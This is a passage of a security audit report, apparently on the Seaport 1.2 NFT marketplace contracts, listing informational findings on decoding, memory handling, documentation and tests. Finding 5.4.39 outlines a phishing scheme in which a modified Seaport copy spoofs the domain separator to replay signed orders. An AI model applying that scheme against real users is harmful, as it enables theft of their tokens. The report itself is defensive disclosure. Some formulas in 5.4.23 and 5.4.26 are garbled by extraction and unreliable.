MaskOverFirstFourBytes) magicMatch := eq(magic, mload(0)) 52 Spearbit: Verified. +5.4.3 Resolving additional offer items supplied by contract orders with criteria can be impractical Severity: Informational Context: CriteriaResolution.sol#L43 Description: Contract orders can supply additional offer amounts when the order is executed. However, if they supply extra offer items with criteria, on the fly, the fulfiller won't be able to supply the necessary criteria resolvers (the correct Merkle proofs). This can lead to flaky orders that are impractical to fulfill. Recommendation: Contract offerers should avoid mismatches between previewOrder and what's executed on- chain. This can be impractical for complex orders. However, offering additional offer items with criteria is something a contract offerer should rarely do, this should be discouraged. Also see Empty criteriaResolvers for criteria-based contract orders. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.4 Use of confusing named constant SpentItem_size in a function that deals with only ReceivedItem Severity: Informational Context: ConsiderationDecoder.sol#L568 Description: The named constant SpentItem_size is used in the function copyReceivedItemsAsConsidera- tionItems, even though the context has nothing to do with SpentItem. Recommendation: Consider making a new named constant and replacing the usage. Seaport: Fixed in commit 3f2312. Spearbit: Verified. +5.4.5 The ABI-decoding of generateOrder returndata does not have sufficient checks to prevent out of bounds returndata reads Severity: Informational Context: ConsiderationDecoder.sol#L456-L461 Description: There was some attempt to avoid out of bounds returndata access in the ConsiderationDecoder. However, the two returndatacopy(...) in ConsiderationDecoder.sol#L456-L461 can still lead to out of bounds access and therefore may revert. Assume that code reaches the line ConsiderationDecoder.sol#L456. We have the following constraints 1. returndatasize >= 4 * 32: ConsiderationDecoder.sol#L428 2. offsetOffer <= returndatasize: ConsiderationDecoder.sol#L444 3. offsetConsideration <= returndatasize: ConsiderationDecoder.sol#L445 If we pick a returndata that satisfies 1 and let offsetOffer == offsetConsideration == returndatasize, all the constraints are true. But the returndatacopy would be revert due to an out-of-bounds read. Note: High-level Solidity avoids reading from out of bounds returndata. This is usually done by checking if re- turndatasize() is large enough for static data types and always doing returndatacopy of the form returndata- copy(x, 0, returndatasize()). Recommendation: 1. If the current behaviour is desired, it's worth documenting that those two returndatacopy(...) that can lead to OOB access. 53 2. If a high-level revert, with additional revert data is desired, just like the other cases with OOB returndata access, then consider adding checks similar to - + let invalidOfferOffset := gt(offsetOffer, returndatasize()) let invalidOfferOffset := gt(add(offsetOffer, 0x20), returndatasize()) A similar check for offsetOffer as well. However, as with any ABI offset calculations, any add(...) will need to be carefully examined to see if it can overflow. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.6 Document that contract orders does not support Seaport-native Dutch or English auctions Severity: Informational Context: • ConsiderationEncoder.sol#L440-L443 • ContractOffererInterface.sol#L7 Description: Seaport supports native Dutch and English auctions by allowing startPrice and endPrice of offer or consideration item to be different. In this case, the current price is derived by interpolating the two different prices. In case of Contract orders, the low-level ABI encoding for generateOrder does not interpolate the price. Instead, it uses the value of startAmount and assumes that both the values are the same. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.7 Consider renaming writeBytes to writeBytes32 Severity: Informational Context: PointerLibraries.sol#L3064 Description: The function name writeBytes is not accurate in this context. Recommendation: - + function writeBytes(MemoryPointer mPtr, bytes32 value) internal pure { function writeBytes32(MemoryPointer mPtr, bytes32 value) internal pure { assembly { mstore(mPtr, value) } } Seaport: Fixed in commit 25af190. Spearbit: Verified. 54 +5.4.8 Zones no longer have access to any criteria information Severity: Informational Context: • OrderFulfiller.sol#L117 • OrderFulfiller.sol#L98 Description: The zone interface was changed from isValidOrderIncludingExtraData to a generic valida- teOrder, this does not give zones access to the criteria resolvers. Moreover, there is a subtlety introduced by changing the restricted order check, from inside _validateOrderAndUpdateStatus to post execution. Any criteria- based order information would be resolved and replaced by _applyCriteriaResolvers, this does not give zones access to the original order. Any zones that have specialized checks based on criteria items will have issues upgrading to work with Seaport 1.2. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.9 Missing test case for criteria-based contract orders and identifierOrCriteria != 0 case Severity: Informational Context: advanced.spec.ts#L434 Description: The only test case for criteria-based contract orders in advanced.spec.ts#L434. This tests the case for identifierOrCriteria == 0. For the other case, identifierOrCriteria != 0 tests are missing. Recommendation: Write tests for criteria-based contract orders and identifierOrCriteria != 0 case, where a Merkle proof for criteria needs to be provided. Also see Empty criteriaResolvers for criteria-based contract orders. Seaport: Fixed in PR 847 and commit c4da5e5. Spearbit: Verified. +5.4.10 NatSpec comment for conduitKey in bulkTransfer() says "optional" instead of "mandatory" Severity: Informational Context: • TransferHelper.sol#L65 • TransferHelper.sol#L75-L77 Description: The NatSpec comment says that conduitKey is optional but there is a check making sure that this value is always supplied. Recommendation: * File: TransferHelper.sol - 65: + 65: 66: ... 74: 75: 76: 77: } * @param conduitKey An optional conduit key referring to a conduit through * @param conduitKey A mandatory conduit key referring to a conduit through which the bulk transfer should occur. // Ensure that a conduit key has been supplied. if (conduitKey == bytes32(0)) { revert InvalidConduit(conduitKey, address(0)); Seaport: Fixed in PR 819. Spearbit: Verified. 55 +5.4.11 As the _counters are incremented by quasiRandomNumber, it would be hard to sign orders that can only be used when the counter is updated Severity: Informational Context: • CounterManager.sol#L46-L50 • CounterManager.sol#L35 Recommendation: As the _counters are incremented by quasiRandomNumber, it would be hard to sign orders that can only be used when the counter is updated (since one can't predict the future block hashes): let quasiRandomNumber := shr(128, blockhash(sub(number(), 1))) Seaport: Fixed in PR 837. Spearbit: Verified. +5.4.12 Comparing the magic values returned by different contracts are inconsistent Severity: Informational Context: • ZoneInteraction.sol#L186 • SignatureVerification.sol#L212 Description: In ZoneInteraction's _callAndCheckStatus we perform the following comparison for the returned magic value: let magic := shr(224, mload(callData)) magicMatch := eq(magic, shr(224, mload(0))) But the returned magic value comparison in _assertValidSignature without truncating the returned value: if iszero(eq(mload(0), EIP1271_isValidSignature_selector)) Recommendation: It would be best to have a consistent comparison when checking the magic value. Perhaps checking the lower bytes are clean as in _assertValidSignature would be the better choice. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.13 Document the structure of the TypehashDirectory Severity: Informational Context: • TypehashDirectory.sol#L119-L120 Description: Instances of TypehashDirectory would act as storage contracts with runtime bytecode: [0x00 - 0x00] 00 [0x01 - 0x20] h(struct BulkOrder { OrderComponents[2] [0x21 - 0x40] h(struct BulkOrder { OrderComponents[2][2] ... [0xNN - 0xMM] h(struct BulkOrder { OrderComponents[2][2]...[2] tree }) tree }) tree }) 56 h calculates the eip-712 typeHash of the input struct. 0xMM would be mul(MaxTreeHeight, 0x20) and 0xNN = 0xMM - 0x1f. Recommendation: Document the above structure. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.14 Document what twoSubstring encodes Severity: Informational Context: • TypehashDirectory.sol#L4 Description: We have: bytes32 constant twoSubstring = 0x5B325D0000000000000000000000000000000000000000000000000000000000; which encodes: cast --to-ascii 0x5B325D0000000000000000000000000000000000000000000000000000000000 [2] Recommendation: Comment that 0x5B325D0000000000000000000000000000000000000000000000000000000000 encodes [2]. Seaport: Fixed in PR 799. Spearbit: Verified. +5.4.15 Upper bits of the to parameter to call opcodes are stripped out by clients Severity: Informational Context: • Executor.sol#L238 • OrderValidator.sol#L374 • SignatureVerification.sol#L196 • TokenTransferrer.sol#L59 • TokenTransferrer.sol#L277 • TokenTransferrer.sol#L418 • TokenTransferrer.sol#L676 • ZoneInteraction.sol#L184 Description: Upper bits of the to parameter to call opcodes are stripped out by clients. For example, geth would strip the upper bytes out: • instructions.go#L674 • uint256.go#L114-L121 So even though the to parameters in this context can have dirty upper bits, the call opcodes can be successful, and masking these values in the contracts is not necessary for this context. Recommendation: Document this fact. Seaport: Acknowledged. 57 Spearbit: Acknowledged. +5.4.16 Remove unused functions Severity: Informational Context: • LowLevelHelpers.sol#L25 • LowLevelHelpers.sol#L112 • ZoneInteraction.sol#L227 • PointerLibraries.sol#L3079 • PointerLibraries.sol#L37 • PointerLibraries.sol#L190 Description: The functions in the above context are not used in the codebase. Recommendation: It you are not planning to use these functions, it would be best to remove them from the codebase. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.17 Fulfillment_itemIndex_offset can be used instead of OneWord Severity: Informational Context: • FulfillmentApplier.sol#L392 • FulfillmentApplier.sol#L678 Description: In the above context, one has: // Get the item index using the fulfillment pointer. itemIndex := mload(add(mload(fulfillmentHeadPtr), OneWord)) Recommendation: Fulfillment_itemIndex_offset is already a defined named constant which has the same value as OneWord (0x20). It would be best to use that constant in this context, since its name is more specific to its usage: itemIndex := mload(add(mload(fulfillmentHeadPtr), Fulfillment_itemIndex_offset)) Seaport: Fixed in PR 819. Spearbit: Verified. 58 +5.4.18 Document how the _pauser role is assigned for PausableZoneController Severity: Informational Context: • PausableZoneController.sol#L123-L131 • PausableZone.sol#L106-L112 Description: The _pauser role is an important role for a PausableZoneController. It can pause any zone created by this controller and thus transfer all the native token funds locked in that zone to itself. Recommendation: It would be best to document how the _pauser is picked for a controller. Currently, the Paus- ableZoneController used by OpenSea has an owner (4/5 GnosisSafe) and the _pauser is also a 2/5 GnosisSafe with the same set of owners. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.19 _aggregateValidFulfillmentConsiderationItems's memory layout assumptions depend on _val- idateOrdersAndPrepareToFulfill's memory manipulation Severity: Informational Context: • FulfillmentApplier.sol#L621-L625 • FulfillmentApplier.sol#L724-L735 • OrderCombiner.sol#L382-L393 using Description: ceivedItem.recipient's offset of considerationItemPtr to write to receivedItem at offset (the same offset is also used here): _aggregateValidFulfillmentConsiderationItems are we In the Re- the same // Set the recipient on the received item. mstore( add(receivedItem, ReceivedItem_recipient_offset), mload(add(considerationItemPtr, ReceivedItem_recipient_offset)) ) looks buggy, This tion[i].endAmount with consideration[i].recipient: but in _validateOrdersAndPrepareToFulfill(...) we overwrite considera- mstore( add( considerationItem, ReceivedItem_recipient_offset // old endAmount ), mload( add( considerationItem, ConsiderationItem_recipient_offset ) ) ) in _fulfillAvailableAdvancedOrders and Also _validateOrdersAndPrepareToFulfill gets called first _matchAdvancedOrders. This is important since the memory for the consideration arrays needs to be updated before we reach _aggregateValidFulfillmentConsiderationItems. 59 Recommendation: This observation needs to be documented/commented on both _validateOrdersAndPre- pareToFulfill and _aggregateValidFulfillmentConsiderationItems to emphasis their dependency on mem- ory layout. Seaport: Fixed in PR 868. Spearbit: Verified. +5.4.20 recipient is provided as the fulfiller for the OrderFulfilled event Severity: Informational Context: • OrderCombiner.sol#L460 • OrderFulfiller.sol#L12 • OrderFulfiller.sol#L361 Description: In the above context in general it is not true that the recipient is the fulfiller. Also note that recipient is address(0) for match orders. Recommendation: Either the correct parameter needs to be provided to _emitOrderFulfilledEvent or the parameter name and comments need to be updated. Seaport: Fixed in commit 119b1e4. Spearbit: Verified. +5.4.21 availableOrders[i] return values need to be explicitly assigned since they live in a region of memory which might have been dirtied before Severity: Informational Context: • OrderCombiner.sol#L728 Description: Seaport 1.1 did not have the following default assignment: if (advancedOrder.numerator == 0) { availableOrders[i] = false; continue; } But this is needed here since the current memory region which was previously used by the accumulator might be dirty. Recommendation: Add a comment to emphasize the above point. Seaport: Fixed in PR 855. Spearbit: Verified. 60 +5.4.22 Usage of MemoryPointer / formatting inconsistent in _getGeneratedOrder Severity: Informational Context: • OrderValidator.sol#L451-L465 • OrderValidator.sol#L416-L427 Description: Usage of MemoryPointer / formatting is inconsistent between the loop used OfferItems and the loop used for ConsiderationItems. Recommendation: It would be best to have a more unified formatting between these 2 loops. Seaport: Fixed in PR 824. Spearbit: Verified. +5.4.23 newAmount is not used in _compareItems Severity: Informational Context: • OrderValidator.sol#L319 Description: newAmount is unused in _compareItems. If originalItem points to I = (t, T , i, as, ae) and the newItem to Inew = (t 0, T 0, i 0, a0 s, a0 e) where parameter description t 0 t T , T 0 i 0 i as, a0 s ae, a0 e c then we have itemType itemType for I after the adjustment for restricted collection items token identifierOrCriteria identifierOrCriteria for I after the adjustment for restricted collection items startAmount endAmount _compareItems c(I, Inew ) = (t 6= t 0) _ (T 6= T 0) _ (i 6= i 0) _ (as 6= ae) and so we are not comparing either as to a0 enforced. In _getGeneratedOrder we have the following check: as > a0 errorBuffer. inequality is reversed for consideration items). And so in each loop (t 6= t 0) _ (T 6= T 0) _ (i 6= i 0) _ (as 6= ae) _ (as > a0 s or a0 s to a0 e. In abi_decode_generateOrder_returndata a0 s = a0 e is s (invalid case for offer items that contributes to s) is ored to errorBuffer. Recommendation: If the newAmount is not planned to be used in _compareItems it can be removed. Document the other constraints on the returned data from the contract offerer mentioned above. Seaport: Acknowledged. Spearbit: Acknowledged. 61 +5.4.24 reformat validate so that its body is consistent with the other external functions Severity: Informational Context: • Consideration.sol#L488 Description / Recommendation: For consistency with other functions we can rewrite validate as: function validate( Order[] calldata /* orders */ ) external override returns (bool /* validated */ ) { return _validate(to_dyn_array_Order_ReturnType( abi_decode_dyn_array_Order )(CalldataStart.pptr())); } Needs to be checked if it changes code size or gas cost. Seaport: Fixed in PR 824. Spearbit: Verified. +5.4.25 Add commented parameter names (Type Location /* name */) Severity: Informational Context: • Consideration.sol#L489 Description / Recommendation: Add commented parameter names (Type Location /* name */) for validate: Order[] calldata /* orders */ Seaport: Fixed in commit 74de34. Spearbit: Verified. +5.4.26 Document that the height provided to _lookupBulkOrderTypehash can only be in a certain range Severity: Informational Context: • ConsiderationBase.sol#L270 Description: Need to have height h provided to _lookupBulkOrderTypehash such that: 1 + 32(h (cid:0) 1) 2 [0, min(0xffffffffffffffff, typeDirectory.codesize) (cid:0) 32] Otherwise typeHash := mload(0) would be 0 or would be padded by zeros. When extcodecopy gets executed extcodecopy(directory, 0, typeHashOffset, 0x20) clients like geth clamp typehashOffset to minimum of 0xffffffff_ffffffff and directory.codesize and pads the result with 0s if out of range. ref: • instructions.go#L373 62 • common.go#L54 Recommendation: Comment on the above limitations/constraints in the code base for _lookupBulkOrderType- hash. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.27 Unused imports can be removed Severity: Informational Context: • ZoneInterface.sol#L5-L8 • TransferHelperInterface.sol#L5 Description: The imported contents in this context are unused. Recommendation: The unused imports can be removed. Seaport: Fixed in PR 829. Spearbit: Verified. +5.4.28 msg.sender is provided as the fulfiller input parameter in a few locations Severity: Informational Context: • ConsiderationEncoder.sol#L234 • ConsiderationEncoder.sol#L81-L82 Description: msg.sender is provided as the fulfiller input parameter. Recommendation: Either this needs to be corrected or previous documentation/comments regarding what a fulfiller means in the context of contract orders needs to be updated. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.29 Differences and similarities of ConsiderationDecoder and solc‘ when decoding dynamic arrays of static/fixed base struct type Severity: Informational Context: • ConsiderationDecoder.sol#L86 • ConsiderationDecoder.sol#L94 Description: The way OfferItem[] in abi_decode_dyn_array_OfferItem and ConsiderationItem[] in abi_- decode_dyn_array_ConsiderationItem are decoded are consistent with solc regarding this: • For dynamic arrays of static/fixed base struct type, the memory region looks like: 63 [mPtrLength --------------------------------------------------- [mPtrLength + 0x20: mPtrLength + 0x40) : mPtrLength + 0x20) arrLength memberTail1 - a memory pointer to the array's 1st element ,! ... [mPtrLength + ...: mPtrLength + ...) memberTailN - a memory pointer to the array's Nth element ,! --------------------------------------------------- [memberTail1 ... [memberTailN : memberTail1 + ) element1 : memberTailN + ) elementN The difference is solc decodes and validates (checking dirty bytes) each field of the elements of the array (which are static struct types) separately (one calldataload and validation per field per element). ConsiderationDecoder skips all those validations for both OfferItems[] and ConsiderationItems[] by copying a chunk of calldata to memory (the tail parts): calldatacopy( mPtrTail, add(cdPtrLength, 0x20), mul(arrLength, OfferItem_size) ) That means for OfferItem[], itemType and token (and also recipient for ConsiderationItem[]) fields can potentially have dirty bytes. Recommendation: Document that struct field validations are skipped and calldata is copied to memory in chunks. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.30 PointerLibraries's malloc skips some checks Severity: Informational Context: • PointerLibraries.sol#L26-L31 Description: malloc in PointerLibraries skips checking if add(mPtr, size) is OOR or wraps around. Solidity does the following when allocating memory: 64 function allocate_memory(size) -> memPtr { memPtr := allocate_unbounded() finalize_allocation(memPtr, size) } function allocate_unbounded() -> memPtr { memPtr := mload() } function finalize_allocation(memPtr, size) { let newFreePtr := add(memPtr, round_up_to_mul_of_32(size)) // protect against overflow if or(gt(newFreePtr, 0xffffffff_ffffffff), lt(newFreePtr, memPtr)) { // <-- the check that is skipped panic_error_() } mstore(, newFreePtr) } function round_up_to_mul_of_32(value) -> result { result := and(add(value, 31), not(31)) } function panic_error_() { // = cast sig "Panic(uint256)" mstore(0, ) mstore(4, ) revert(0, 0x24) } Also note, rounding up the size to the nearest word boundary is hoisted out of malloc. Recommendation: The above needs to be documented, especially if this file gets used by other projects. As Seaport enforces bounds on size outside this library file. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.31 abi_decode_bytes can populate memory with dirty bytes Severity: Informational Context: • ConsiderationDecoder.sol#L60 Description: When abi_decode_bytes decodes bytes, it rounds its size and copies the rounded size from calldata to memory. This memory region might get populated with dirty bytes. So for example: For both signature and extraData we are using abi_decode_bytes. If the AdvancedOrder is tightly packed and: • If signature's length is not a multiple of a word (0x20) part of the extraData.length bytes will be copied/duplicated to the end of signature's last memory slot. • If extraData's length is not a multiple of a word (0x20) part of the calldata that comes after extraData's tail will be copied to memory. Even if AdvancedOrder is not tightly packed (tail offsets are multiple of a word relative to the head), the user can stuff the calldata with dirty bits when signature's or extraData's length is not a multiple of a word. And those dirty bits will be carried over to memory during decoding. Note, these extra bits will not be overridden or 65 cleaned during the decoding because of the way we use and update the free memory pointer (incremented by the rounded-up number to a multiple of a word). Recommendation: Care needs to be taken when using the copied memory region if the size gets rounded to a greater number to make sure the dirty bytes don't get used. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.32 abi_encode_validateOrder reuses a memory region Severity: Informational Context: • ConsiderationEncoder.sol#L361-L364 Description: It is really important to note that before abi_encode_validateOrder is called, _prepareBasicFul- fillmentFromCalldata(...) needs to be called to populate the memory region that is used for event OrderFul- filled(...) which can be reused/copied in this function: MemoryPointer.wrap(offerDataOffset).copy( dstHead.offset(tailOffset), offerAndConsiderationSize ); From when the memory region for OrderFulfilled(...) is populated till we reach this point, care needs to be taken to not modified that region. accumulator data is written to the memory after that region and the current implementation does not touch that region during the whole call after the event has been emitted. Recommendation: It is important to document this reuse of memory region and dependence of abi_encode_- validateOrder and _prepareBasicFulfillmentFromCalldata(...). Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.33 abi_encode_validateOrder writes to a memory region that might have been potentially dirtied by accumulator Severity: Informational Context: • ConsiderationEncoder.sol#L210 Description: In abi_encode_validateOrder potentially (in the future), we might be writing in an area where accumulator was used. And since the book-keeping for the accumulator does not update the free memory pointer, we need to make sure all bytes in the memory in the range [dst, dst+size) are fully updated/written to in this function. Recommendation: Leave note and document the above. Seaport: Fixed in PR 866. Spearbit: Verified. 66 +5.4.34 Reorder writing to memory in ConsiderationEncoder to follow the order in struct definitions. Severity: Informational Context: • ConsiderationEncoder.sol#L334-L335 Description: Reorder the memory writes in ConsiderationEncoder to follow the order in struct definitions. Recommendation: Change the order of dstHead.offset(ZoneParameters_offerer_offset).write(parameters.offerer); dstHead.offset(ZoneParameters_fulfiller_offset).write(msg.sender); to dstHead.offset(ZoneParameters_fulfiller_offset).write(msg.sender); dstHead.offset(ZoneParameters_offerer_offset).write(parameters.offerer); Seaport: Fixed in PR 830. Spearbit: Verified. +5.4.35 The compiled YUL code includes redundant consecutive validation of enum types Severity: Informational Description: Half the location where an enum type struct field has been used/accessed, the validation function for this enum type is performed twice: validator_assert_enum_(memPtr) validator_assert_enum_(memPtr) Recommendation: This is possibly a compiler bug. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.36 Consider writing tests for revert functions in ConsiderationErrors Severity: Informational Context: ConsiderationErrors.sol Description: ConsiderationErrors.sol is a new file and is untested. Writing test cases to make sure the revert functions are throwing the right errors is an easy way to prevent mistakes. Recommendation: Consider adding the following foundry test file: ConsiderationErrorsTest.t.sol // SPDX-License-Identifier: MIT pragma solidity ^0.8.17; import "forge-std/Test.sol"; import "../../contracts/lib/ConsiderationErrors.sol"; import { ConsiderationEventsAndErrors } from ,! "../../contracts/interfaces/ConsiderationEventsAndErrors.sol"; import { ReentrancyErrors } from "../../contracts/interfaces/ReentrancyErrors.sol"; import { CriteriaResolutionErrors } from "../../contracts/interfaces/CriteriaResolutionErrors.sol"; 67 import { TokenTransferrerErrors } from "../../contracts/interfaces/TokenTransferrerErrors.sol"; import { ZoneInteractionErrors } from "../../contracts/interfaces/ZoneInteractionErrors.sol"; import { FulfillmentApplicationErrors } from ,! "../../contracts/interfaces/FulfillmentApplicationErrors.sol"; contract ConsiderationErrorsTests is Test { function test__revertInsufficientEtherSupplied() public { vm.expectRevert(ConsiderationEventsAndErrors.InsufficientEtherSupplied.selector); _revertInsufficientEtherSupplied(); } function test__revertOrderAlreadyFilled(bytes32 orderHash) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.OrderAlreadyFilled.selector, orderHash)); _revertOrderAlreadyFilled(orderHash); } function test__revertBadFraction() public { vm.expectRevert(ConsiderationEventsAndErrors.BadFraction.selector); _revertBadFraction(); } function test__revertConsiderationNotMet(uint256 i, uint256 j, uint256 unmetAmount) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.ConsiderationNotMet.selector, i, j, unmetAmount)); _revertConsiderationNotMet(i, j, unmetAmount); } function test__revertInvalidBasicOrderParameterEncoding() public { vm.expectRevert(ConsiderationEventsAndErrors.InvalidBasicOrderParameterEncoding.selector); _revertInvalidBasicOrderParameterEncoding(); } function test__revertInvalidCallToConduit(address conduit) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.InvalidCallToConduit.selector, conduit)); _revertInvalidCallToConduit(conduit); } function test__revertInvalidCanceller() public { vm.expectRevert(ConsiderationEventsAndErrors.InvalidCanceller.selector); _revertInvalidCanceller(); } function test__revertInvalidConduit(bytes32 conduitKey, address conduit) public { vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.InvalidConduit.selector, ,! conduitKey, conduit)); _revertInvalidConduit(conduitKey, conduit); } function test__revertInvalidMsgValue(uint256 value) public { vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.InvalidMsgValue.selector, ,! value)); _revertInvalidMsgValue(value); } 68 function test__revertInvalidNativeOfferItem() public { vm.expectRevert(ConsiderationEventsAndErrors.InvalidNativeOfferItem.selector); _revertInvalidNativeOfferItem(); } function test__revertInvalidTime(uint256 startTime, uint256 endTime) public { vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.InvalidTime.selector, ,! startTime, endTime)); _revertInvalidTime(startTime, endTime); } function test__revertMissingOriginalConsiderationItems() public { vm.expectRevert(ConsiderationEventsAndErrors.MissingOriginalConsiderationItems.selector); _revertMissingOriginalConsiderationItems(); } function test__revertNoSpecifiedOrdersAvailable() public { vm.expectRevert(ConsiderationEventsAndErrors.NoSpecifiedOrdersAvailable.selector); _revertNoSpecifiedOrdersAvailable(); } function test__revertOrderIsCancelled(bytes32 orderHash) public { vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.OrderIsCancelled.selector, ,! orderHash)); _revertOrderIsCancelled(orderHash); } function test__revertOrderPartiallyFilled(bytes32 orderHash) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(ConsiderationEventsAndErrors.OrderPartiallyFilled.selector, orderHash)); _revertOrderPartiallyFilled(orderHash); } function test__revertPartialFillsNotEnabledForOrder() public { vm.expectRevert(ConsiderationEventsAndErrors.PartialFillsNotEnabledForOrder.selector); _revertPartialFillsNotEnabledForOrder(); } function test__revertConsiderationLengthExceedsTotalOriginal() public { vm.expectRevert(ConsiderationEventsAndErrors.ConsiderationLengthExceedsTotalOriginal.selector); _revertConsiderationLengthExceedsTotalOriginal(); } function test__revertNoReentrantCalls() public { vm.expectRevert(ReentrancyErrors.NoReentrantCalls.selector); _revertNoReentrantCalls(); } function test__revertCriteriaNotEnabledForItem() public { vm.expectRevert(CriteriaResolutionErrors.CriteriaNotEnabledForItem.selector); _revertCriteriaNotEnabledForItem(); } function test__revertUnresolvedConsiderationCriteria(uint256 i, uint256 j) public { vm.expectRevert(abi.encodeWithSelector(CriteriaResolutionErrors.UnresolvedConsiderationCriteria ,! ,! .selector, i, j)); _revertUnresolvedConsiderationCriteria(i, j); } function test__revertUnresolvedOfferCriteria(uint256 i, uint256 j) public { c 69 ,! ,! vm.expectRevert(abi.encodeWithSelector(CriteriaResolutionErrors.UnresolvedOfferCriteria.selector, i, j)); _revertUnresolvedOfferCriteria(i, j); } function test__revertOrderCriteriaResolverOutOfRange() public { vm.expectRevert(abi.encodeWithSelector(CriteriaResolutionErrors.OrderCriteriaResolverOutOfRange ,! ,! .selector, Side.CONSIDERATION)); _revertOrderCriteriaResolverOutOfRange(Side.CONSIDERATION); } function test__revertInvalidProof() public { vm.expectRevert(CriteriaResolutionErrors.InvalidProof.selector); _revertInvalidProof(); } function test__revertUnusedItemParameters() public { vm.expectRevert(TokenTransferrerErrors.UnusedItemParameters.selector); _revertUnusedItemParameters(); } function test__revertInvalidERC721TransferAmount(uint256 amount) public { ,! ,! vm.expectRevert(abi.encodeWithSelector(TokenTransferrerErrors.InvalidERC721TransferAmount.selector, amount)); _revertInvalidERC721TransferAmount(amount); } function test__revertInvalidRestrictedOrder(bytes32 orderHash) public { vm.expectRevert(abi.encodeWithSelector(ZoneInteractionErrors.InvalidRestrictedOrder.selector, ,! orderHash)); _revertInvalidRestrictedOrder(orderHash); } function test__revertInvalidContractOrder(bytes32 orderHash) public { vm.expectRevert(abi.encodeWithSelector(ZoneInteractionErrors.InvalidContractOrder.selector, ,! orderHash)); _revertInvalidContractOrder(orderHash); } ,! ,! ,! function test__revertMismatchedFulfillmentOfferAndConsiderationComponents(uint256 fulfillmentIndex) public { vm.expectRevert(abi.encodeWithSelector(FulfillmentApplicationErrors.MismatchedFulfillmentOfferA ndConsiderationComponents.selector, fulfillmentIndex)); _revertMismatchedFulfillmentOfferAndConsiderationComponents(fulfillmentIndex); } function test__revertMissingFulfillmentComponentOnAggregation() public { vm.expectRevert(abi.encodeWithSelector(FulfillmentApplicationErrors.MissingFulfillmentComponent ,! ,! OnAggregation.selector, Side.OFFER)); _revertMissingFulfillmentComponentOnAggregation(Side.OFFER); } function test__revertOfferAndConsiderationRequiredOnFulfillment() public { ,! vm.expectRevert(FulfillmentApplicationErrors.OfferAndConsiderationRequiredOnFulfillment.selector); _revertOfferAndConsiderationRequiredOnFulfillment(); } 70 c c c } Seaport: Fixed in PR 867. Spearbit: Verified. +5.4.37 Typo in comment for the selector used in ConsiderationEncoder.sol#abi_encode_validateOrder() Severity: Informational Context: ConsiderationEncoder.sol#L221, ConsiderationEncoder.sol#L321 Description: Minor typo in comments: // Write ratifyOrder selector and get pointer to start of calldata dst.write(validateOrder_selector); Recommendation: - + // Write ratifyOrder selector and get pointer to start of calldata // Write validateOrder selector and get pointer to start of calldata dst.write(validateOrder_selector); Seaport: Fixed in PR 831. Spearbit: Verified. +5.4.38 _contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constrainsts. Severity: Informational Context: • OrderValidator.sol#L382 • OrderValidator.sol#L402-L404 • ConsiderationEncoder.sol#L144-L147 Description: _contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constraints. This is the case when errorBuffer !=0 and revertOnInvalid == false (ful- fillAvailableOrders, fulfillAvailableAdvancedOrders). In this case, Seaport would not call back into the contract offerer's ratifyOrder(...) endpoint. Thus, the next time this offerer receives a ratifyOrder(...) call from Seaport, the nonce shared with it might have incremented more than 1. Recommendation: The above scenario should be documented so that the contract offerer would be aware of this fact. Seaport: Fixed in PR 865. Spearbit: Verified. 71 +5.4.39 Users need to be cautious about what proxied/modified Seaport or Conduit instances they approve their tokens to Severity: Informational Context: • ConsiderationBase.sol#L112-L113 • ConsiderationBase.sol#L37 Description: Seaport ( S ) uses EIP-712 domain separator to make sure that when users sign orders, the signed orders only apply to that specific Seaport by pinpointing its name, version, the chainid, and its address. The domain separator is calculated and cached once the Seaport contract gets deployed. The domain separator only gets recalculated when/if the chainid changes (in the case of a hard fork for example). Some actors can take advantage of this caching mechanism by deploying a contract ( S0 ) that : • Delegates some of its endpoints to Seaport or it's just a proxy contract. • Its codebase is almost identical to Seaport except that the domain separator actually replicates what the original Seaport is using. This only requires 1 or 2 lines of code change (in this case the caching mechanism is not important) function _deriveDomainSeparator() { ... // Place the address of this contract in the next memory location. mstore(FourWords, MAIN_SEAPORT_ADDRESS) // <--- modified line and perhaps the actor can define a ,! named constant Assume a user approves either: 1. Both the original Seaport instance and the modified/proxied instance or, 2. A conduit that has open channels to both the original Seaport instance and the modified/proxied instance. And signs an order for the original Seaport that in the 1st case doesn't use any conduits or in the 2nd case the order uses the approved conduit with 2 open channels. Then one can use the same signature once with the original Seaport and once with the modified/proxied one to receive more tokens than offerer / user originally had intended to sell. Recommendation: The scenario depicted above belongs to the phishing attack category. Users need to be diligent when they approve their tokens to an operator. OpenSea can monitor the chains to label contracts that resemble its code base but have some modifications or monitor calls that have been delegated to Seaport. OpenSea also should monitor all the conduits (and their open channels) that have been created using its corresponding controller. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.40 ZoneInteraction contains logic for both zone and contract offerers Severity: Informational Context: • ZoneInteraction.sol#L34-L39 Description: ZoneInteraction contains logic for both zone and contract offerers. Recommendation: Perhaps the contract/file name can be changed to reflect that its functionality is not only restricted to zone's. Also the contract level NatSpec can be updated. Seaport: Acknowledged. Spearbit: Acknowledged. 72 +5.4.41 Orders of CONTRACT order type can lower the value of a token offered Severity: Informational Context: • ContractOffererInterface.sol#L7-L12 • ContractOffererInterface.sol#L16-L22 